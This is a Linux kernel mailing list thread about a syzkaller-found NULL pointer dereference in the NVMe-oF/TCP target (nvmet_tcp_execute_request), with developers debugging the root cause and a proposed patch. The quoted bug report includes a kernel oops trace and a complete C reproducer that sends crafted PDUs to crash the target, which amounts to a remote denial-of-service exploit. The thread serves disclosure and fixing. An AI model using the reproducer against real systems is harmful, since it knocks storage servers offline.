> > u16 nvmet_parse_connect_cmd(struct nvmet_req *req)
> > {
> >      struct nvme_command *cmd = req->cmd;
> >
> >      ...
> >
> >      if (cmd->connect.qid == 0)
> >          req->execute = nvmet_execute_admin_connect;
> >      else
> >          req->execute = nvmet_execute_io_connect;
> >       return 0;
> > }
> > ```
> >
> > ## Root Cause
> > When executing the reproducer the `nvmet_parse_connect_cmd` is not
> > being called, but execution is continuing to
> > `nvmet_tcp_execute_request` .
> >
> > ## Reproducer
> > I am adding a reproducer generated by Syzkaller with some
> > optimizations and minor changes.
>
> Could you try the change to see if it helps?
>
> --- a/drivers/nvme/target/tcp.c
> +++ b/drivers/nvme/target/tcp.c
> @@ -1062,7 +1062,7 @@ static int nvmet_tcp_done_recv_pdu(struct nvmet_tcp_queue *queue)
>  			le32_to_cpu(req->cmd->common.dptr.sgl.length));
> 
>  		nvmet_tcp_handle_req_failure(queue, queue->cmd, req);
> -		return 0;
> +		return -EAGAIN;
>  	}
>
> Thanks,
> Guoqing

I checked it.
Although it seems useful to return an error there anyway, it does not
help with this bug. The flow leading to the NULL dereference does not
reach that code at all, which is probably part of why the bug happens.
The call trace looks like this:
```
 nvmet_tcp_execute_request drivers/nvme/target/tcp.c:578 [inline]
 nvmet_tcp_try_recv_data drivers/nvme/target/tcp.c:1232 [inline]
 nvmet_tcp_try_recv_one drivers/nvme/target/tcp.c:1312 [inline]
 nvmet_tcp_try_recv drivers/nvme/target/tcp.c:1338 [inline]
 nvmet_tcp_io_work+0x202a/0x2990 drivers/nvme/target/tcp.c:1388
```
so `nvmet_tcp_done_recv_pdu` is not called here.



* Re: [Bug Report] NVMe-oF/TCP - NULL Pointer Dereference in `nvmet_tcp_execute_request`
  2023-11-19 22:18   ` Alon Zahavi
@ 2023-11-20  6:03     ` Guoqing Jiang
  0 siblings, 0 replies; 6+ messages in thread
From: Guoqing Jiang @ 2023-11-20  6:03 UTC (permalink / raw)
  To: Alon Zahavi
  Cc: linux-nvme, Sagi Grimberg, Christoph Hellwig, Chaitanya Kulkarni



On 11/20/23 06:18, Alon Zahavi wrote:
> On Thu, 16 Nov 2023 at 05:28, Guoqing Jiang <guoqing.jiang@linux.dev> wrote:
>>
>> Could you try the change to see if it helps?
>>
>> --- a/drivers/nvme/target/tcp.c
>> +++ b/drivers/nvme/target/tcp.c
>> @@ -1062,7 +1062,7 @@ static int nvmet_tcp_done_recv_pdu(struct nvmet_tcp_queue *queue)
>>  			le32_to_cpu(req->cmd->common.dptr.sgl.length));
>> 
>>  		nvmet_tcp_handle_req_failure(queue, queue->cmd, req);
>> -		return 0;
>> +		return -EAGAIN;
>>  	}
>>
>> Thanks,
>> Guoqing
> Checked it.
> Although it seems useful to return some error here anyways, it doesn't
> help with the bug.
> The flow leading to the NULL deref doesn't reach this code at all,
> which is probably
> part of why it happens.
> The call trace looks like this:
> ```
>   nvmet_tcp_execute_request drivers/nvme/target/tcp.c:578 [inline]
>   nvmet_tcp_try_recv_data drivers/nvme/target/tcp.c:1232 [inline]
>   nvmet_tcp_try_recv_one drivers/nvme/target/tcp.c:1312 [inline]
>   nvmet_tcp_try_recv drivers/nvme/target/tcp.c:1338 [inline]
>   nvmet_tcp_io_work+0x202a/0x2990 drivers/nvme/target/tcp.c:1388
> ```
> so `nvmet_tcp_done_recv_pdu` is not called here.

My guess is that if rcv_state == NVMET_TCP_RECV_PDU, the flow is:

nvmet_tcp_try_recv_one -> nvmet_tcp_try_recv_pdu
                            -> return nvmet_tcp_done_recv_pdu
                                 -> nvmet_tcp_handle_req_failure
                                      -> *rcv_state = NVMET_TCP_RECV_DATA*
                                 -> return 0

then back in nvmet_tcp_try_recv_one, it continues to call
nvmet_tcp_try_recv_data instead of going to done_recv.
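
In other words, paraphrasing the receive loop (not verbatim kernel code, just
a sketch of the flow above, with the helper names taken from the call trace),
a zero return from the PDU stage lets the same invocation fall straight
through to the data stage:

```
/* Paraphrased sketch of nvmet_tcp_try_recv_one() - not verbatim code. */
static int nvmet_tcp_try_recv_one(struct nvmet_tcp_queue *queue)
{
	int result = 0;

	if (queue->rcv_state == NVMET_TCP_RECV_PDU) {
		/* Ends in nvmet_tcp_done_recv_pdu(); on a failed
		 * nvmet_req_init() that path calls
		 * nvmet_tcp_handle_req_failure(), sets rcv_state to
		 * NVMET_TCP_RECV_DATA and returns 0. */
		result = nvmet_tcp_try_recv_pdu(queue);
		if (result != 0)
			return result;	/* only a non-zero return stops here */
	}

	if (queue->rcv_state == NVMET_TCP_RECV_DATA) {
		/* With a zero return we keep going and receive the inline
		 * data, which ends in nvmet_tcp_execute_request(). */
		result = nvmet_tcp_try_recv_data(queue);
	}

	/* ... remaining stages omitted from this sketch ... */
	return result;
}
```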

Thanks,
Guoqing



* Re: [Bug Report] NVMe-oF/TCP - NULL Pointer Dereference in `nvmet_tcp_execute_request`
  2023-11-06 13:39 [Bug Report] NVMe-oF/TCP - NULL Pointer Dereference in `nvmet_tcp_execute_request` Alon Zahavi
  2023-11-15  9:40 ` Alon Zahavi
  2023-11-16  3:28 ` Guoqing Jiang
@ 2023-11-20 10:36 ` Sagi Grimberg
  2 siblings, 0 replies; 6+ messages in thread
From: Sagi Grimberg @ 2023-11-20 10:36 UTC (permalink / raw)
  To: Alon Zahavi, linux-nvme; +Cc: Christoph Hellwig, Chaitanya Kulkarni


> # Bug Overview
> 
> ## The Bug
> There is a null-ptr-deref in `nvmet_tcp_execute_request`.
> 
> ## Bug Location
> `drivers/nvme/target/tcp.c` in the function `nvmet_tcp_execute_request`.
> 
> ## Bug Class
> Remote Denial of Service
> 
> ## Disclaimer:
> This bug was found using Syzkaller with NVMe-oF/TCP added support.

Hey Alon, thanks for the report.

> 
> # Technical Details
> 
> ## Kernel Report - NULL Pointer Dereference
> ```
> BUG: kernel NULL pointer dereference, address: 0000000000000000
> #PF: supervisor instruction fetch in kernel mode
> #PF: error_code(0x0010) - not-present page
> PGD 800000003c2bc067 P4D 800000003c2bc067 PUD 3dfc5067 PMD 0
> Oops: 0010 [#1] PREEMPT SMP KASAN PTI
> CPU: 0 PID: 2363 Comm: kworker/0:1H Not tainted 6.5.0-rc1+ #4
> Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
> Workqueue: nvmet_tcp_wq nvmet_tcp_io_work
> RIP: 0010:0x0
> Code: Unable to access opcode bytes at 0xffffffffffffffd6.
> RSP: 0018:ffff888013b0fba8 EFLAGS: 00010246
> RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000000
> RDX: ffff888013d50000 RSI: ffffffff833ddfe5 RDI: ffff88800e5a33e8
> RBP: ffff888013b0fcf0 R08: 0000000000000001 R09: 0000000000000000
> R10: 0000000000000000 R11: 0000000000000001 R12: ffff88800e5a33e8
> R13: 0000000000000000 R14: ffff88800e5a33e0 R15: dffffc0000000000
> FS:  0000000000000000(0000) GS:ffff88806cc00000(0000) knlGS:0000000000000000
> CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
> CR2: ffffffffffffffd6 CR3: 0000000016faa003 CR4: 0000000000370ef0
> Call Trace:
>   <TASK>
>   nvmet_tcp_execute_request drivers/nvme/target/tcp.c:578 [inline]
>   nvmet_tcp_try_recv_data drivers/nvme/target/tcp.c:1232 [inline]
>   nvmet_tcp_try_recv_one drivers/nvme/target/tcp.c:1312 [inline]
>   nvmet_tcp_try_recv drivers/nvme/target/tcp.c:1338 [inline]
>   nvmet_tcp_io_work+0x202a/0x2990 drivers/nvme/target/tcp.c:1388
>   process_one_work+0xb54/0x18b0 kernel/workqueue.c:2597
>   worker_thread+0x663/0x1300 kernel/workqueue.c:2748
>   kthread+0x357/0x460 kernel/kthread.c:389
>   ret_from_fork+0x29/0x50 arch/x86/entry/entry_64.S:308
>   </TASK>
> Modules linked in:
> CR2: 0000000000000000
> ---[ end trace 0000000000000000 ]---
> ```
> 
> ## Description
> 
> ### Tracing The Bug
> In the call for `nvmet_tcp_execute_request` (see code block 1), there
> is a call to `cmd->req.execute()`.
> When executing the reproducer, the function pointer is pointing to
> NULL, thus the BUG: Unable to handle NULL pointer dereference.
> 
> Code Block 1:
> ```
> static void nvmet_tcp_execute_request(struct nvmet_tcp_cmd *cmd)
> {
>      if (unlikely(cmd->flags & NVMET_TCP_F_INIT_FAILED))
>          nvmet_tcp_queue_response(&cmd->req);
>      else
>          cmd->req.execute(&cmd->req);
> }
> ```
> 
> The reason why `cmd->req.execute` is NULL when we get into the
> `nvmet_tcp_execute_request` function lies in the `nvmet_req_init`
> function (drivers/nvme/target/core.c).
> 
> Code Block 2:
> ```
> bool nvmet_req_init(struct nvmet_req *req, struct nvmet_cq *cq,
>                                   struct nvmet_sq *sq, const struct
> nvmet_fabrics_ops *ops)
> {
>      ...
> 
>      if (unlikely(!req->sq->ctrl))
>          /* will return an error for any non-connect command: */
>          status = nvmet_parse_connect_cmd(req);
>      else if (likely(req->sq->qid != 0))
>          status = nvmet_parse_io_cmd(req);
>      else
>          status = nvmet_parse_admin_cmd(req);
> 
>    ...
> }
> ```
> 
> In the `nvmet_parse_admin_cmd` and `nvmet_parse_connect_cmd`
> functions, there are some assignments for `req->execute`.
> For example, here is in code block 3, the assignment in
> `nvmet_parse_connect_command` (drivers/nvme/target/fabrics-cmd.c).
> 
> Code Block 3:
> ```
> u16 nvmet_parse_connect_cmd(struct nvmet_req *req)
> {
>      struct nvme_command *cmd = req->cmd;
> 
>      ...
> 
>      if (cmd->connect.qid == 0)
>          req->execute = nvmet_execute_admin_connect;
>      else
>          req->execute = nvmet_execute_io_connect;
>       return 0;
> }
> ```
> 
> ## Root Cause
> When executing the reproducer the `nvmet_parse_connect_cmd` is not
> being called, but execution is continuing to
> `nvmet_tcp_execute_request` .

Your analysis tells me that sq->ctrl was not properly set to NULL when
a connect command was sent? The place where sq->ctrl is set is when
executing a connect command.

Can you send a log trace from nvmet leading up to the stack trace?
Also, I'm trying to decipher what the reproducer does.
Is it a tcp connect + icreq + nvme connect pdus?

> 
> ## Reproducer
> I am adding a reproducer generated by Syzkaller with some
> optimizations and minor changes.
> 
> ```
> // autogenerated by syzkaller (https://github.com/google/syzkaller)
> 
> #define _GNU_SOURCE
> 
> #include <endian.h>
> #include <errno.h>
> #include <fcntl.h>
> #include <sched.h>
> #include <stdarg.h>
> #include <stdbool.h>
> #include <stdint.h>
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <sys/mount.h>
> #include <sys/prctl.h>
> #include <sys/resource.h>
> #include <sys/stat.h>
> #include <sys/syscall.h>
> #include <sys/time.h>
> #include <sys/types.h>
> #include <sys/wait.h>
> #include <unistd.h>
> 
> #include <linux/capability.h>
> 
> uint64_t r[1] = {0xffffffffffffffff};
> 
> void loop(void)
> {
>    intptr_t res = 0;
>    res = syscall(__NR_socket, /*domain=*/2ul, /*type=*/1ul, /*proto=*/0);
>    if (res != -1)
>      r[0] = res;
>    *(uint16_t*)0x20000100 = 2;
>    *(uint16_t*)0x20000102 = htobe16(0x1144);
>    *(uint32_t*)0x20000104 = htobe32(0x7f000001);
>    syscall(__NR_connect, /*fd=*/r[0], /*addr=*/0x20000100ul, /*addrlen=*/0x10ul);
>    *(uint8_t*)0x200001c0 = 0;
>    *(uint8_t*)0x200001c1 = 0;
>    *(uint8_t*)0x200001c2 = 0x80;
>    *(uint8_t*)0x200001c3 = 0;
>    *(uint32_t*)0x200001c4 = 0x80;
>    *(uint16_t*)0x200001c8 = 0;
>    *(uint8_t*)0x200001ca = 0;
>    *(uint8_t*)0x200001cb = 0;
>    *(uint32_t*)0x200001cc = 0;
>    memcpy((void*)0x200001d0,
>           "\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf"
>           "\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf"
>           "\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35"
>           "\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86"
>           "\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf"
>           "\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf"
>           "\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86",
>           112);
>    syscall(__NR_sendto, /*fd=*/r[0], /*pdu=*/0x200001c0ul, /*len=*/0x80ul,
>            /*f=*/0ul, /*addr=*/0ul, /*addrlen=*/0ul);
>    *(uint8_t*)0x200001c0 = 6;
>    *(uint8_t*)0x200001c1 = 3;
>    *(uint8_t*)0x200001c2 = 0x18;
>    *(uint8_t*)0x200001c3 = 0x18;
>    *(uint32_t*)0x200001c4 = 9;
>    *(uint16_t*)0x200001c8 = 0;
>    *(uint16_t*)0x200001ca = 0;
>    *(uint32_t*)0x200001cc = 0;
>    *(uint32_t*)0x200001d0 = 0;
>    memset((void*)0x200001d4, 0, 4);
>    *(uint64_t*)0x20000240 = 0;
>    syscall(__NR_sendto, /*fd=*/r[0], /*pdu=*/0x200001c0ul, /*len=*/0x88ul,
>            /*f=*/0ul, /*addr=*/0ul, /*addrlen=*/0ul);
> }
> int main(void)
> {
>    syscall(__NR_mmap, /*addr=*/0x1ffff000ul, /*len=*/0x1000ul, /*prot=*/0ul,
>            /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
>    syscall(__NR_mmap, /*addr=*/0x20000000ul, /*len=*/0x1000000ul, /*prot=*/7ul,
>            /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
>    syscall(__NR_mmap, /*addr=*/0x21000000ul, /*len=*/0x1000ul, /*prot=*/0ul,
>            /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
>    loop();
>    return 0;
> }
> ```


